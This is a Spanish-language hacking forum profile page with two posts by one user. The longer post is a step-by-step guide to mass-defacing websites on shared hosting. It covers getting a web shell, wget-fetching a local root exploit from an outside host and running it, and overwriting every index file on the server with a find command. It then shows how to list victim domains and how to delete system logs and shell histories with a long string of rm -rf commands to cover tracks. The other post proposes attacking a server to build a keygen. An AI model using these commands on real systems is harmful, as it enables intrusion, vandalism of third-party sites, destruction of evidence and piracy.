rehizner

Miembros
  • Content Count

    3
  • Joined

  • Last visited

Community Reputation

0 Neutral

About rehizner

  • Rank
    Bit
  1. Habria que atacar el servidor web y ver que clase de algoritmo usan para generar las key y despues programar algun keygen en base a ese algoritmo
  2. Lo primero es conseguir acceso a un servidor web que contenga mas sitios web adentro. si el acceso que conseguiste es por medio de una web shell ( c99, r57 etc ) o por shell de sistema da igual. ahora deberas conseguir permisos de root, ni pienses en cranearte creando un local root exploit por que se requiere gran experiencia en programacion, conocimiento de assembler entre otras cosas y si los tuvieras no estarias leyendo este paper xD, asi que deberas conseguirte un local root exploit para obtener los privilegios que necesitas, puedes obtenerlos de esta web http://tarantula.by.ru/localroot/ . Ahora para saber que version de kernel es bastara con ejecutar un uname: uname -a te respondera con algo como esto: Linux vtux.goahosting.com 2.6.9-023stab043.1-smp #1 SMP Mon Mar 5 16:35:19 MSK 2007 i686 i686 i386 GNU/Linux Entonces en ese caso ya sabes que la version del kernel es la 2.6.9 ahora deberas subir el LRE correspondiente a esa version y ejecutarlo Si estas usando una webshell usa el uploader que te facilita, si estas a traves de una shell de sistema tendras que usar el metodo wget: wget tarantula.by.ru/localroot/2.6.9/krad ahi lo subiste a la carpeta en la que te encontrabas al momento de ejecutar el comando ahora deberas brindarle permisos para ejecutarlo: chmod 777 krad y despues ejecutarlo ./krad deberas esperar hasta que el LRE haga lo suyo... para saber si obtuviste los permisos de root ejecuta un id: id si te responde con algo como: uid=99(nobody) gid=99(nobody) groups=99(nobody) estas cagado en cambio si te responde con algo como: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys) puedes estar feliz xD. ahora procedamos a reemplazar todos los index o home o main o etc, que se encuentren en el servidor. Sube tu index ya sea a traves del uploader de la webshell que estas usando o con el wget con wget seria algo asi: wget miweb.com/miindex.htm Ahora ejecuta el comando que enviara tu index al directorio donde se encuentran los index de las victimas: find / -name "index.*" -exec cp /tmp/miindex.htm {} \; recuerda cambiar el tmp por la ruta donde subiste tu index. Ahora deberas saber cuales fueron las web que modificaste. Ahi distintos metodos ya que no todos los servidores web estan configurados de la misma manera, estos son los que conozco: 1. Encontrando el o los httpd.conf : find / -name httpd.conf 2. Leyendo los ficheros userdomains y trueuserdomains : cat /etc/userdomains o cat /etc/trueuserdomains 3. realizar un ls a /usr/local/frontpage: ls /usr/local/frontpage/ 4. Este es uno que descubri de hace poco y haciendo un ls a el directorio /var/named : ls /var/named Ahora si no lograron obtener permisos de root debido a que el kernel es muy nuevo o esta parchado pueden intenter acceder a las carpetas publicas de las webs hospedadas en el servidor. para eso deberan primero conocer las cuentas que tiene el servidor haciendo un ls al directorio mail: ls /var/spool/mail o ls /var/mail Ahora que saben cuales son las cuentas que hay en el servidor tendran que reemplazar la cuenta en la que estan por la que quieren acceder, ejemplo: estan en /home/luis/public_html y en el directorio mail leyeron que existia una cuenta llamada pedro reemplazen luis por pedro y ya tendran acceso a lo que esta en esa otra cuenta siempre y cuando la carpeta public_html tenga permisos de lectura. Generalmente el nombre de la cuenta es semejante a la del dominio asi que solo deben comparar los nombres con los que encontraron en /var/named/ . Ahora para finalizar el ataque ahi que borrar los logs: rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \; eso lo pueden ejecutar uno por uno o guardarlo con cualquier nombre , darle permisos y ejecutarlo: chmod 777 borrarlogs ./borrarlogs y recuerden que aunq tengan permisos de solo lectura ahi veces en las que podran igual desfigurar un sitio web, leyendo ficheros de configuracion , entrando en la base de datos y desde ahi desfigurar. Eso es todo cualquier duda pregunten. ByteZ By rehizner.